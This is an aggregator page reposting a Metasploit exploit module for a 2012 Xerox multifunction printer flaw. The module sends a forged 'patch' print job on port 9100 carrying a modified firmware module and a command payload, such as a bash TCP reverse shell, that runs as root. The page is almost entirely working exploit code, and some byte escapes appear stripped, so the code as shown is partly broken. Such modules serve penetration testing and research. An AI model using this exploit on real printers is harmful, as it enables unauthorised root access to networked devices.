HackDig : Dig high-quality web security articles for hacker

Xerox Multifunction Printers (MFP) "Patch" DLM Vulnerability

2014-11-02 13:40

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote

Rank = GoodRanking
include Msf::Exploit::Remote::Tcp

def initialize(info = {})
super(update_info(info,
'Name' => 'Xerox Multifunction Printers (MFP) "Patch" DLM Vulnerability',
'Description' => %{
This module exploits a vulnerability found in Xerox Multifunction Printers (MFP). By
supplying a modified Dynamic Loadable Module (DLM), it is possible to execute arbitrary
commands under root priviages.
},
'Author' =>
[
'Deral "Percentx" Heiland',
'Pete "Bokojan" Arzamendi'
],
'References' =>
[
['BID', '52483'],
['URL',
'http://www.xerox.com/download/security/security-bulletin/1284332-2ddc5-4baa79b70ac40/cert_XRX12-003_v1.1.pdf'],
['URL', 'http://foofus.net/goons/percx/Xerox_hack.pdf']
],
'Privileged' => true,
'License' => MSF_LICENSE,
'Payload' =>
{
'DisableNops' => true,
'Space' => 512,
'Compat' =>
{
'PayloadType' => 'cmd cmd_bash',
'RequiredCmd' => 'generic bash-tcp'
}
},
'Platform' => ['unix'],
'Arch' => ARCH_CMD,
'Targets' => [['Automatic', {}]],
'DisclosureDate' => 'Mar 07 2012',
'DefaultTarget' => 0))

register_options(
[
Opt::RPORT(9100)
], self.class)
end

def exploit
print_status("#{rhost}:#{rport} - Sending print job...")
firmcode = '%%XRXbegin' + "x0A"
firmcode << '%%OID_ATT_JOB_TYPE OID_VAL_JOB_TYPE_DYNAMIC_LOADABLE_MODULE' + "x0A"
firmcode << '%%OID_ATT_JOB_SCHEDULING OID_VAL_JOB_SCHEDULING_AFTER_COMPLETE' + "x0A"
firmcode << '%%OID_ATT_JOB_COMMENT "PraedaPWN2014:' + "#{payload.encoded}" + ':"' +
"x0A"
firmcode << '%%OID_ATT_JOB_COMMENT "patch"' + "x0A"
firmcode << '%%OID_ATT_DLM_NAME "xerox"' + "x0A"
firmcode << '%%OID_ATT_DLM_VERSION "NO_DLM_VERSION_CHECK"' + "x0A"
firmcode << '%%OID_ATT_DLM_SIGNATURE
"ca361047da56db9dd81fee6a23ff875facc3df0e1153d325c2d217c0e75f861b"' + "x0A"
firmcode << '%%OID_ATT_DLM_EXTRACTION_CRITERIA "extract /tmp/xerox.dnld"' + "x0A"
firmcode << '%%XRXend' + "x0Ax1Fx8Bx08x00xB1x8Bx49x54x00x03xED"
firmcode << "xD3x41x4BxC3x30x14x07xF0x9ExFBx29xFExE2x60x20x74"
firmcode << "x69x63x37x61x5AxBCx79x94xDDx3CxC8xA0x59x9BxDAx4A"
firmcode << "xD7xCCxB4xD3x1DxF6xE1x8DxDDx64xB8x83x3Bx0Dx11xFE"
firmcode << "xBFx43x03xAFx2FxEFxBDxB4x64xA3xADxD9x8CxDAxD2x3B"
firmcode << "xA3xD0xB9x19x8FxFBxD5x39x5ExC3x58x4ExBCx48xC6x52"
firmcode << "x5Ex87xE3x89x8CxBDx30x8AxE4x44x7Ax08xCFx39xD4xB7"
firmcode << "x75xDBx29x0Bx78xD6x98xEExB7xBCx53xEFxFFxA9xCBx0B"
firmcode << "xB1xA8x1AxB1x50x6DxE9x17x55x9DxA4x2Fx56xAFx10xD4"
firmcode << "x08x1Ex30x9Cx59xA5x73x35x7Bx7Ax94x61x14x0Fx21xDE"
firmcode << "x95x15xEDxCAx98x5Ax34x99x68x74x27x5ExCDx62x7Ax35"
firmcode << "x8Ax52xBFx2AxF0x8CxA0xC0xC0xD5xC0xDCxEFx4AxDDxF8"
firmcode << "xC0x47x59xD5x1Ax56xABx1Cx75xD5x68x17xC9x8Dx7Bx00"
firmcode << "x3Ax2Bx0Dx06x5Fx31x6CxB1xEBxF8x06xFCx68xD7xE7xF5"
firmcode << "x65x07xF7x48x12x84x98xDFx62x5Fx17xC8xCCx72xA9x9A"
firmcode << "x3Cx49x0Fx95xB6xD9xBAx43x90x4FxDDx18x32xEDx93x8A"
firmcode << "xAAxEFxE8x9AxDCxF5x83xF9xBBxE4xFDxDExEDxE1xE0x76"
firmcode << "x89x91xD8xECx6Fx82xFBx0CxFEx5FxFFx15x22x22x22x22"
firmcode << "x22x22x22x22x22x22x22x22x22x22x22x22x22xA2xD3x3E"
firmcode << "x01x5Ax18x54xBBx00x28x00x00"

begin
connect
sock.put(firmcode)
handler
rescue ::Timeout::Error, Rex::ConnectionError, Rex::ConnectionRefused, Rex::HostUnreachable, Rex::ConnectionTimeout,
Rex::AddressInUse => e
print_error("#{rhost}:#{rport} - #{e.message}")
ensure
disconnect
end
end
end

References:

http://www.xerox.com/download/security/security-bulletin/1284332-2ddc5-4baa79b70ac40/cert_XRX12-003_v1.1.pdf


Source: 1000114102-BLW/eussi/moc.ytirucesxc

Read:3012 | Comments:0 | Tags: Vulnerability

“Xerox Multifunction Printers (MFP) "Patch" DLM Vulnerability”0 Comments

Submit A Comment

Name:

Email:

Blog :

Verification Code:

Announce

Share high-quality web security related articles with you:)

Tools

Tag Cloud